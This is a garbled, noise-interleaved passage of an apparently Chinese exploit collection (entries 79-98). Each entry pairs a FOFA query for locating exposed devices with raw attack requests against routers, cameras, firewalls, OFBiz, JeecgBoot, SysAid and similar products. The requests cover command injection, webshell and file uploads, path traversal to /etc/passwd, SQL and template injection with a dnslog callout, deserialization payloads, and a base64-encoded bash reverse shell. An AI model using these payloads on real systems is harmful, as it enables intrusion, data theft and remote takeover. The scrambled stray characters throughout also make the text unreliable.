" x/ z8 _# _5 Y' V/ i& qGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1" t. m1 C t# }9 e8 W+ n0 T
Host: x.x.x.x/ |2 U' n1 I8 ~5 p2 \, k
, {9 [& {% i8 ^/ d1 L* ]) i ?2 C t
79. BYTEVALUE 百为流控路由器远程命令执行
+ E+ T! c- ^: |7 |9 iFOFA:BYTEVALUE 智能流控路由器7 J9 s' L2 X! u% j6 v4 I( }
GET /goform/webRead/open/?path=|id HTTP/1.1, N7 ?/ ^# I- ?* c
Host:IP9 N8 Y8 W1 ]& c3 o" X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.02 e0 Y j% o% \8 c' i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ M' E2 A; J3 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% x9 l, {9 p& n' b+ z' j
Accept-Encoding: gzip, deflate
) O& K: A4 y( E) N; OConnection: close
9 S8 u' R T1 y" UUpgrade-Insecure-Requests: 11 K+ l" {* b) x7 o. D( {0 A: A
0 d9 Y- ^5 C: G+ w; ] U" p) e
+ B1 n. `" c# Y' r# k6 X80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传 \+ _, M1 t* y
FOFA:app="速达软件-公司产品"
& P- g# T2 ]& \ C6 T7 B# u% yPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1( S u, C+ T$ ?
Host: x.x.x.x2 d1 c- H8 O) o9 ?# w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& c8 P* p- S" q; k" X
Content-Length: 27
, k" P7 ~8 u! p9 @/ S+ Y/ ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# |6 D1 D% v2 B4 p$ H% K- bAccept-Encoding: gzip, deflate2 s9 Z4 [% N2 @" V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" J r& u( ~+ p+ K0 p1 A: f+ }
Connection: close
8 D. S( L v6 a _ nContent-Type: application/octet-stream
K/ F4 Q2 x+ E7 F: ~* W( iUpgrade-Insecure-Requests: 1$ l0 w2 ~2 [, o: f/ e _9 F$ i
( c. }& @6 |, g) Z# d4 V* D
<% out.print("oessqeonylzaf");%>
1 F7 c% l+ V2 X: T# ?: o+ o P1 l5 J7 `3 {) g- G
& e! `# h. |, l% W% sGET /xykqmfxpoas.jsp HTTP/1.1: n* _& Q/ _, j8 D! d
Host: x.x.x.x$ ]) U% N0 X& m# v9 {6 z+ |3 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ u g: k3 `/ E3 q4 u, Z" C" {# M; C' \
Connection: close& c+ B* _0 x c- Y3 K( C# G
Accept-Encoding: gzip
5 q K* F0 y6 }, p4 a& P2 h' B! @' r3 E5 E
$ m6 L. c0 j# m+ H. U8 B1 }81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
0 W9 G: q9 e9 @: d, BFOFA:app="uniview-视频监控"
( X8 S& U3 ^+ x" z. gGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1& Q0 `: s$ C4 T I# R9 u
Host: x.x.x.x0 ^; G, I" B% Z6 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 e% E2 U: [4 X% T* P/ T2 Z) Z
Connection: close8 h4 @: |# {+ j9 S9 A& O/ ^
Accept-Encoding: gzip
9 q. b3 O+ z a6 p' |) J% |( q
% ^4 s: n) p6 a6 ~# T9 H1 u2 O' |% `0 C( m$ V
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
2 k9 E. I7 }0 I7 t% eFOFA:app="思福迪-LOGBASE"+ L; e# |: Y# n' s# R& q1 ]0 Z( K
POST /bhost/test_qrcode_b HTTP/1.13 }; I* z1 f. S2 ~4 t
Host: BaseURL3 G+ o# P" R3 h
User-Agent: Go-http-client/1.1
$ Z( I9 C x: `" D7 d& ^. YContent-Length: 23; O! W0 ]% x0 v4 S& Z( i, W- E
Accept-Encoding: gzip& C$ b4 |& E# x
Connection: close
p2 v: G( }# | u2 {5 BContent-Type: application/x-www-form-urlencoded5 V* x( t2 D9 \: B2 m9 Y9 k
Referer: BaseURL5 r+ v# m# X( l. Y
; {( @: Y- E9 g
z1=1&z2="|id;"&z3=bhost
9 Z7 F5 X! c( S$ n- v% b+ A
2 j$ G9 F& ?6 m: p1 N F+ ~/ b% B/ n+ H2 F) j" z
83. JeecgBoot testConnection 远程命令执行; V g9 ^1 `- I
FOFA:title=="JeecgBoot 企业级低代码平台") C+ c5 l+ k0 \
8 p6 w$ W' X: W$ E& J6 u: L# ]
/ \' a/ R3 u0 l& o) i0 h# o, s
POST /jmreport/testConnection HTTP/1.16 _( M3 W4 C! L! |; j) H
Host: x.x.x.x- m' q2 B% }' j+ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 G, `, V: b& e6 X: `* W& _4 ]
Connection: close
7 G) Q7 b' b3 ]Content-Length: 8881
; j, M2 Q* s2 P, J& hAccept-Encoding: gzip. |* _* z) o- f
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"6 Q8 [8 }4 l9 |( \+ }3 J
Content-Type: application/json
3 R* v4 l/ U; c+ l; i; |2 s7 S
6 F- u# J" i1 ]; b: L# G4 L6 VPAYLOAD) A/ X) i* N& K0 ]- R5 u
3 p8 ~& [+ u( H
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入- t) O* q8 S0 u" _ O$ s( b
FOFA:title=="JeecgBoot 企业级低代码平台"" w8 h" X2 g0 G: c4 b6 v& B4 j; a% v
6 ~, J" b2 x0 \1 ^( O+ z& C
7 b* v3 {" |( X Q
" M/ t0 y, `2 i' s5 O
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1% H" a$ U" O0 B7 X( z
Host: 192.168.40.130:8080$ g% [0 Q a( v2 d, A4 I" ]
User-Agent: curl/7.88.10 I3 z4 c: O, `9 m2 q3 Z
Content-Length: 156
* Z3 P/ F/ X) W1 ]' }Accept: */*
% F$ g/ U! X5 p( {3 u4 d1 {Connection: close; y# ^* q8 g/ J) F$ u2 w
Content-Type: application/json
! _7 i( Y0 f4 h9 G- uAccept-Encoding: gzip8 R1 V9 K1 S- l& u8 ?3 O
" B6 O1 O! t3 l+ @{$ [- @3 b4 g7 J
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
/ T5 U" [: E7 J' F7 U/ a "type": "0"! B, W8 S7 n. e3 e& U
}
2 X. Y7 d# r7 \% K, R6 H$ P; X3 t! v& s1 f* z) ?+ ]
, [5 @2 y- A/ K, k% G1 i
85. SysAid On-premise< 23.3.36远程代码执行
5 ?- s1 ^ F& }# f+ \# i$ JCVE-2023-47246
) T& B" G+ a7 \- I: BFOFA:body="sysaid-logo-dark-green.png"
W, J7 ^% M6 t" b4 a$ J$ n& @EXP数据包如下,注入哥斯拉马
7 u$ S1 Z3 [8 l( G; |" TPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1& \* U0 t# {9 b7 ?
Host: x.x.x.x# c$ T6 p$ A; m0 I7 I: I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) Y/ [' | P/ X0 l" @Content-Type: application/octet-stream
; g( G" X% h6 KAccept-Encoding: gzip" H8 b3 m/ G) q
- t% [. G2 F6 Q% [5 I) |( Y" I
PAYLOAD2 h$ i! e* H l4 W
( b& R! n$ g) X, [& T) w, M
回显URL:http://x.x.x.x/userfiles/index.jsp
$ U, _9 [9 c8 D! }/ K5 j ]& J8 ?. w! P, s; N G" g
86. 日本tosei自助洗衣机RCE
0 {# b8 s( W& h$ K5 ^' oFOFA:body="tosei_login_check.php"/ Y5 ^" h8 E }9 k/ E
POST /cgi-bin/network_test.php HTTP/1.1
+ t% u' o+ S* z* [Host: x.x.x.x
) R' p- f) \. ^+ KUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.368 m2 O* l- o L9 u
Connection: close. q$ r7 J' w( T( R$ @ L% p, C
Content-Length: 445 |7 q5 X6 C! ?
Accept: */*9 g' Y6 C( }4 q8 L' A. Y# s% ^9 i3 ?
Accept-Encoding: gzip5 Z/ o5 J3 {* P: ~
Accept-Language: en1 t" }) Z- A8 Z+ I
Content-Type: application/x-www-form-urlencoded
! D0 k6 Y8 j, [' Y2 K
+ ^8 r7 w1 h+ B4 Ohost=%0acat${IFS}/etc/passwd%0a&command=ping1 u; ]) N8 p8 J, v* i6 Q& Q
4 r- b" p' A; Y9 W5 G+ t/ a! Q' i7 q x* Z1 R+ [
87. 安恒明御安全网关aaa_local_web_preview文件上传
h: N; _2 U% ]! J( x1 vFOFA:title="明御安全网关"
* k& n6 K& A; V7 }! U4 U/ j# N, g" bPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
9 a" [" z& g+ U a3 T: |Host: X.X.X.X: \1 i5 x! x% n0 X' h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" D, f. I( J; P, U9 ]- K
Connection: close& p2 }7 ~" M" C% s$ @
Content-Length: 1984 \' r( T1 [! p6 @
Accept-Encoding: gzip2 B& I1 B! q0 b
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
# L( O- E9 T8 M% M% D) s
8 i, g" N0 W+ U# O4 F |: d--qqobiandqgawlxodfiisporjwravxtvd
2 \/ l2 {# C7 _) r, C Q1 zContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
4 o8 _, K; Q( n( G- ?; Z6 c4 HContent-Type: text/plain
) a' d4 L4 x7 N1 `7 t m2 \9 J- f% o
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
6 K. h+ |& B2 [0 Q--qqobiandqgawlxodfiisporjwravxtvd--- @* j/ h- g3 t! H* C" i! ^
) j& q0 Q! y# l( g6 N
$ u3 {! m) N: x
/jfhatuwe.php6 w8 v* ?6 Y0 |
) y% Y X. y8 T7 q- O3 \. q4 f
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行2 ?, I) u4 G0 P! X4 n
FOFA:title="明御安全网关"6 G; ~, r) {' _! h. c/ k' H
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
6 n& }2 a. E% S2 G& n1 DHost: x.x.x.xx.x.x.x( Y/ E, Z) T, E+ p, t/ [6 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# z# e4 K- P: p. K+ [1 S9 }7 X4 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ Q7 Y+ r1 O6 `' c j5 R% L% ^Accept-Encoding: gzip, deflate
% Y4 H; s( N" ] d- d) m8 F" cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
r' A8 D0 d& d( J* K0 L/ d, MConnection: close
; o; Z& L( W# B7 O8 d1 u9 r5 h# J# a! P+ R! @) c! c/ n( r
0 f5 b( {. X8 w
/astdfkhl.php4 V$ [# X) W2 k/ D% C: N# _
5 z$ z1 |. m( U% O6 F! {) m89. 致远互联FE协作办公平台editflow_manager存在sql注入; S! b* n! D, p* [- K) G- r" ^
FOFA:title="FE协作办公平台" || body="li_plugins_download"
9 [2 k' X2 s4 P! Q4 d% TPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
& \- m# N2 y7 {, v# k EHost: x.x.x.x
2 }, B& Z1 _" c2 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; {8 }0 M [% _2 e' {5 V y
Connection: close" B5 Q/ F2 C/ W9 O% X" p9 I
Content-Length: 41: u$ b# ?4 }' C1 M5 w
Content-Type: application/x-www-form-urlencoded" _9 Q; _/ O/ _5 X5 J
Accept-Encoding: gzip1 \$ Z; W! N2 Q( X! F" I
! n* d4 L: H) O' X/ a
option=2&GUID=-1'+union+select+111*222--+! _8 p0 d0 X4 f1 U3 f1 n- C+ c
* R3 p m! m% c3 D6 D* w( S; }- @4 a
- k; Q1 j& Y6 I6 X9 i" E, |0 U6 S90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行- N9 Y, H |9 e \2 Z
FOFA:icon_hash="-1830859634"' K+ z5 ~- @8 s4 T2 l
POST /php/ping.php HTTP/1.1, ?* L+ K5 N# z! n, U
Host: x.x.x.x( U9 Y. |$ N7 ?6 U4 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
8 @. q8 C" M, o& q6 }Content-Length: 51
; C; p8 e3 M, ?3 eAccept: application/json, text/javascript, */*; q=0.01 I+ l9 f7 d: E, f
Accept-Encoding: gzip, deflate( B4 K( P( Z6 X( m& p( Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 l+ a" @! ?5 G, ?) r$ R: nConnection: close
* }4 {3 s4 U: BContent-Type: application/x-www-form-urlencoded3 c; E8 n. J! z" G0 ~; m( Y
X-Requested-With: XMLHttpRequest
% [, _* k5 _% f
, ^/ {: j, p( t2 Z: n" e4 G/ Fjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
" _. I' T) z& S* E, c; r5 d. n H) `& l5 m9 v# s; x' V: B' e+ G
2 E. e2 Q8 y. k6 q; {
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取0 U; s5 I& Z2 F0 G2 _; B' G
FOFA:title="综合安防管理平台"( M5 p. F X1 V2 M; k% L* _* O
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.11 ]3 _" p" V0 i4 F2 p* A
Host: your-ip1 ~. t$ \2 s* w1 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ ^8 J8 v. A3 t9 _& r8 A1 EAccept-Encoding: gzip, deflate5 p0 M$ s4 ~$ O$ F( w5 y } c3 G
Accept: */*) H" o. K* c% Z* k! D* M
Connection: keep-alive
' K& z1 x0 S! n2 K
M" J: G5 ]) D8 o4 K' Q5 U! A' Y6 W0 T
- {( e$ g6 ]% [; G7 {0 w$ c
92. 海康威视运行管理中心session命令执行* o& g2 U7 a: M. p% `: T
Fastjson命令执行
* Q2 e( G4 f5 N `' I# F& Xhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"# ]/ d8 M3 [& a, r
POST /center/api/session HTTP/1.1
6 s7 H7 O) o; t" m7 p! m; i+ ~3 NHost: c+ d4 U5 Y% H& s0 J U
Accept: application/json, text/plain, */*% v4 a1 U6 G9 {1 G- x' H; j# V
Accept-Encoding: gzip, deflate
$ k& S/ Y/ H) h4 xX-Requested-With: XMLHttpRequest
& v' q; D# f v$ ?& ~Content-Type: application/json;charset=UTF-8+ | C6 u% _1 r. @
X-Language-Type: zh_CN
: n7 t8 ^. I' x# H: r6 eTestcmd: echo test! o3 ^0 o' k8 Z5 T5 ]) m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36. p, I+ a% p# v' H Q& y; W1 w
Accept-Language: zh-CN,zh;q=0.9+ A1 j& W; H8 R3 F- i. y+ p
Content-Length: 57787 o9 ^0 g2 f- Z! M7 }
/ @$ _3 o( T5 L$ x* \4 [PAYLOAD% j3 B c9 T9 |7 ~
; L! m6 D8 R) x# C
. j3 y/ h3 b7 ]# S# S
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
7 b+ L2 i7 X5 i" R! p3 s% v; dFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
4 w+ v O3 {+ |0 L% `POST /?g=app_av_import_save HTTP/1.1' P7 t5 ~, ^% d5 m4 _$ K& \! u
Host: x.x.x.x
( n! B) s4 z. E4 }Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
& C" t! a1 j0 JUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 ], O" D8 ]8 I( x! D/ l1 C) b- M" {$ \8 y) M$ d/ K! f7 |
------WebKitFormBoundarykcbkgdfx
9 N; y- X# s6 i( gContent-Disposition: form-data; name="MAX_FILE_SIZE"8 q+ @- t$ B' M: b; o& _
* t8 L9 Y# ^3 ^2 @& e10000000! V$ ]9 a) ^, I; U0 e v$ l1 X: Y
------WebKitFormBoundarykcbkgdfx
2 |& F' G. V4 [- f! W- e# B6 ZContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
2 X. K# j! ?/ Q7 \3 W; e( [Content-Type: text/plain0 O* u G6 ?, F ]
) m' e- R, G- H& g
wagletqrkwrddkthtulxsqrphulnknxa
7 W: _2 {+ Y& T" P9 f# A, D------WebKitFormBoundarykcbkgdfx
$ i2 ^; H5 E3 \' _. [Content-Disposition: form-data; name="submit_post"
D1 v, H4 b- M8 r$ w
! u4 n/ H) j9 ~7 |6 k) Fobj_app_upfile
& \- L, [% F" F4 @, V------WebKitFormBoundarykcbkgdfx/ D! Q1 Y2 K- f
Content-Disposition: form-data; name="__hash__": a$ q5 ^6 g, u) [. G$ V/ {
; F% P3 b! Q6 \2 u: s0b9d6b1ab7479ab69d9f71b05e0e94458 `; {. l! |+ p& Y3 V) F, o
------WebKitFormBoundarykcbkgdfx--
N, j( S' [# u% o j b2 ^
4 ^0 K1 A( b" H4 R
' |- Z5 {" h3 [GET /attachements/xlskxknxa.txt HTTP/1.1
5 U6 R( N4 M) o: ^- KHost: xx.xx.xx.xx9 e" ~5 h5 m- ^7 u) P9 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& ^1 O! P7 \, d" L; |+ l) D3 J* h( n+ h& c
: Y$ L9 l9 q5 p* d94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
: M: m9 l1 T1 j& ]6 `FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
, @$ u7 J4 S3 |) K6 IPOST /?g=obj_area_import_save HTTP/1.1
" M% d4 x# Y0 c/ ^Host: x.x.x.x
9 w& q$ ^6 T3 z: L8 Q0 e% m& jContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt. L" W8 J/ N2 z2 h, M; ]1 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. l9 V( y& u. \5 \7 x+ X( B" {! k) P, j/ ` u: d
------WebKitFormBoundarybqvzqvmt. H3 B. d& V/ C. z: F3 }
Content-Disposition: form-data; name="MAX_FILE_SIZE"
. \! y: \* n* H5 k9 l1 i3 Q: N$ c- N; a1 o+ H$ j# K6 v. s) v
10000000/ K- }- e2 v9 E" ] t* ^
------WebKitFormBoundarybqvzqvmt! |" l' z0 h. Y: @% X2 ~8 r
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"" g" g0 p- d7 B1 Y( D5 R
Content-Type: text/plain; ~% O x1 S, i/ Z% {% g9 f
m- T# L' O! S; u8 R8 bpxplitttsrjnyoafavcajwkvhxindhmu
& b. D, q: ?' B7 e! Z------WebKitFormBoundarybqvzqvmt% @2 D/ N" \* s1 b
Content-Disposition: form-data; name="submit_post"+ ?, R0 `( t% J) B
7 Z3 ?+ ^3 o+ g" [8 z, bobj_app_upfile
3 C7 h: `, ^/ K0 r; J: Z------WebKitFormBoundarybqvzqvmt
4 K N; z# U9 W; n9 uContent-Disposition: form-data; name="__hash__"6 i" I# t1 u9 T# v+ h! r
5 D3 B; q4 @9 w. @0 l
0b9d6b1ab7479ab69d9f71b05e0e9445: c$ F3 {! Q/ `4 Z @+ E+ J
------WebKitFormBoundarybqvzqvmt--
- X$ @- S) [+ n- M! g6 }2 m+ D5 x2 }2 I" A8 a: [
9 D! m! X! Z8 o$ Q
. V. l, e; ?$ nGET /attachements/xlskxknxa.txt HTTP/1.1
0 Y2 T0 z" V6 A. I v# I lHost: xx.xx.xx.xx
% [/ s/ z2 a' QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* o8 u5 z* U2 F* ^2 h4 N
4 U) i# v# k& r" H- I
0 H& L/ q- Y% G$ X$ m* a
4 L& I6 O$ b' x/ X' `; j. i95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
) j6 {6 B% i8 z1 `& JCVE-2023-49070
. ?" e( k# H* {4 v* t# uFOFA:app="Apache_OFBiz"# O# [/ H5 {$ q5 z4 s/ S/ I5 t
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 f% Y4 ?9 k7 {& z( @6 b4 z( P
Host: x.x.x.x
4 k- f- |1 N% l! v' _& e* iUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 v& C s& h3 KConnection: close1 k. V1 v* h+ }* H# P* D7 u
Content-Length: 8890 J* j0 x3 ?9 s, o0 d: {
Content-Type: application/xml
1 I) G! E' p3 q) V1 eAccept-Encoding: gzip
! F6 h! P: p, G
5 T5 I7 f0 J" a4 i5 |7 C8 Z<?xml version="1.0"?>
0 E/ b! o5 q, b<methodCall>
1 L0 u" L z0 T2 Z$ a <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>8 C4 X) A! U5 v3 Z
<params>
% l' l/ e4 [* r# k <param>
9 O/ p5 F. n9 u <value>
/ E5 T; Y) G: p- a <struct>8 S2 d8 _& T# ~3 e, \
<member>
1 B- t8 w2 p! m0 c4 U. E <name>test</name>
( T4 Z; @ T7 ^9 T( T <value>
9 e, d: D4 O; ^ <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
2 Z: [5 P2 o: s, k# n3 z N% Z, i </value>
/ D2 k! t( k" H: z+ Y. G$ C </member>
# m- @! G) z& h B: D8 F( H* F& w# M </struct>: e' _1 P8 W: V9 t; a, [
</value>
8 ]4 j9 x- ~' K* |$ A7 Y </param> o2 P& C m+ C1 |( G
</params>
& ~ p6 b) \: d</methodCall>
, R+ i1 _& G. l" M' S! X8 y7 @% c( p
5 d7 I- ~/ m! G4 a7 C, G, ^用ysoserial生成payload
) A4 E( B) j; k0 Njava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
: F1 N3 Z7 k& L- e8 d% A d. `1 n* Y
) }9 q/ N6 B- n4 @将生成的payload替换到上面的POC
) Q1 e' k3 w& t* D+ \* b9 [POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
( n5 p9 B i: t$ S2 _3 rHost: 192.168.40.130:8443 N1 Z0 R3 E' y z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ c' A# U* T. A- X; P7 M
Connection: close6 j% v, V# x: w+ i
Content-Length: 8895 k, h* ] Z/ @
Content-Type: application/xml+ J; y- @! A4 [/ h* e& L- s+ H2 T* e
Accept-Encoding: gzip
! R) j: K/ v! R5 Y" E$ k
; a; t! Q% k1 W: RPAYLOAD
( d$ L+ B2 |* p! _( o% j! J1 A$ M! X; j7 j" K
96. Apache OFBiz 18.12.11 groovy 远程代码执行
& y; H" p j7 q- N- IFOFA:app="Apache_OFBiz"7 Q+ S' k# k5 U0 f2 `4 A, i
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1 Q6 N( q' p# x# w p# v% S2 C
Host: localhost:8443 P! Q$ \. x" Q5 g) K1 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0* R5 |) f4 y7 F2 s0 K
Accept: */*
$ c: s: b4 y/ ~4 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 e8 i) U d* w( k! O
Content-Type: application/x-www-form-urlencoded
" J! r- v2 @( [2 M, C+ A+ GContent-Length: 554 K* H" R j& C( G. A* e
9 o* ^) p i7 [5 E7 H+ ]groovyProgram=throw+new+Exception('id'.execute().text);
6 c9 K. L! I0 _; S) s; f. ?/ l" M- o
. M' g3 [- b( `反弹shell
$ Q% x& ^$ g$ t, _/ G" l# H% ]4 |2 u在kali上启动一个监听
1 h1 o7 m; W: m: P( s2 W, `nc -lvp 7777
2 C3 I j$ u" z4 s/ i/ \1 |- k# E- c4 M- t; [3 F
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; u* X& |" u; c' l. A
Host: 192.168.40.130:84437 o5 b u2 i" y2 Q+ ~: A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 _! q0 q/ b1 z UAccept: */*
4 T( H8 _% v6 K& x V4 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. C0 [: Y. m, b+ D. Q
Content-Type: application/x-www-form-urlencoded
) A' @0 l; H* {& O- RContent-Length: 71
/ S# H& e! J; {3 t" _# B, u
$ _! J2 p: w/ ^* p) O$ }" egroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
% n2 P. k/ v2 L8 x7 C' L- Y! \, _2 h; F( V9 w' _9 ^4 a9 J9 _+ C
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行+ Z0 ]4 E9 n8 _4 I$ J/ e( ]
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"/ o. H+ K& p1 U8 Z
GET /passport/login/ HTTP/1.1
2 O+ l' ]1 f- M2 O* x$ _5 ~Host: 192.168.40.130:80855 k0 c* l* m! G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 O" H/ X( _- l1 s0 eAccept-Encoding: gzip% D4 y. w" M1 c- ^4 {3 Z+ ~) S
Connection: close
( W; W, G! B7 m3 C4 }: G2 q9 m5 p) OCookie: rememberMe=PAYLOAD3 W# ?4 y! k" }2 L
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"& P8 O2 ~2 w2 y9 n3 H, x4 _/ w
' ]( y! i& E4 A2 l
7 a+ _' Q% q4 _4 Z98. SpiderFlow爬虫平台远程命令执行
" }7 q# X! g3 b* BCVE-2024-0195
: w! z3 M, P N: X0 l* ?7 [; YFOFA:app="SpiderFlow"
' k* V- Y4 ^/ q7 ^, V) dPOST /function/save HTTP/1.1: B) u, G. v) s: x7 n( l+ p
Host: 192.168.40.130:8088' l, {" M+ b7 Y6 h. @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 s. E8 v( n v5 e' V, b& I4 WConnection: close, Q; D* E. |+ b
Content-Length: 121
( z2 x; ^6 L+ z' CAccept: */*% ~' J0 [+ }2 q* S" G. j
Accept-Encoding: gzip, deflate
8 |. d1 [4 i/ {+ Q$ ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 A+ c' {9 v& D( ?; G1 ^
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
* A) h8 Z% g0 w1 u0 nX-Requested-With: XMLHttpRequest
0 M* z! e @# J: q9 @* _1 n/ K+ C3 r0 G; \* r/ D, i: t. Y
